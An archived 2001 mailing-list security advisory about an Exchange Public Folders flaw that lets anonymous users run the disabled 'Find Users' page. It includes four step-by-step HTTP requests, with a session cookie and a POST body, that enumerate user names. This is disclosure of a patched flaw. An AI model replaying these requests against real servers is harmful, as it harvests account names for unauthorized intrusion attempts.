Exchange Public Folders Information Leakage

From: Aviram Jenik (aviram@BEYONDSECURITY.COM)
Date: 09/07/01


Message-ID:  <00d301c13782$bb0ea5a0$fe01a8c0@aviram>
Date:         Fri, 7 Sep 2001 11:51:52 +0200
From: Aviram Jenik <aviram@BEYONDSECURITY.COM>
Subject:      Exchange Public Folders Information Leakage
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

The following security advisory is sent to the securiteam mailing list,
and
can be found at the SecuriTeam web site: http://www.securiteam.com

SUMMARY

Microsoft Exchange Server handles anonymous access to its Public Folders

insecurely. While administrators may disable the "Find Users" features
to
prevent anonymous users from enumerating existing user names, a security

flaw in Exchange server allows remote attackers with access to the
exchange server to run "Find Users".

DETAILS

Microsoft Exchange's Public Folders options of "Find Users" can be
disabled. This, however, does not prevent the users from directly
accessing the ASP page (fumsg.asp). The link to the "Find Users" will be

hidden, however it is still possible to programmatically access the
page.

Steps to recreate:
1) Contact:
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com

2) Access the redirected page, and resend the issued cookie.
GET /exchange/logonfrm.asp HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

3) Access the redirected page, and resend the issued cookie.
GET /exchange/root.asp?acs=anon HTTP/1.1
Host: www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

4) Issue this request to obtain a list of users with the letter 'a' in
their name (e.g. Administrator)
POST /exchange/finduser/fumsg.asp HTTP/1.1
Host: www.example.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

Vendor status:
Microsoft has been contacted on August 4, 2001. A security bulletin was
released on September 7, 2001.

Solution:
Microsoft has released a patch for this problem. See
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
more information.

ADDITIONAL INFORMATION
This security hole was discovered by <mailto:noamr@securiteam.com> Noam
Rathaus.
The information has been provided by <mailto:experts@secuiteam.com>
SecuriTeam Experts.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any
kind.
In no event shall we be liable for any damages whatsoever including
direct,
indirect, incidental, consequential, loss of business profits or special
damages.

============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
============================================================================



Relevant Pages

  • Exchange Public Folders Information Leakage
    ... The following security advisory is sent to the securiteam mailing list, ... Microsoft Exchange Server handles anonymous access to its Public Folders ... and resend the issued cookie. ...
    (Bugtraq)
  • Re: Groups/Public Folders
    ... You can use Distribution Groups to restricted access to public folders in a ... Exchange 2000/2003 public folders can only grant permissmions to security ...
    (microsoft.public.exchange.admin)
  • [NT] Exchange Public Folders Information Leakage
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Exchange Server handles anonymous access to its Public Folders ... and resend the issued cookie. ...
    (Securiteam)
  • Re: Migrating Public Folders
    ... Did you install Exchange 2003 into the same Organization as your Exchange ... to migrate your public folders you can use PFAdmin to ... Migrate the Public Folders whilst keeping the security.! ...
    (microsoft.public.exchange.admin)
  • Re: Migrating Public Folders
    ... Did you install Exchange 2003 into the same Organization as your Exchange ... to migrate your public folders you can use PFAdmin to ... Migrate the Public Folders whilst keeping the security.! ...
    (microsoft.public.exchange2000.admin)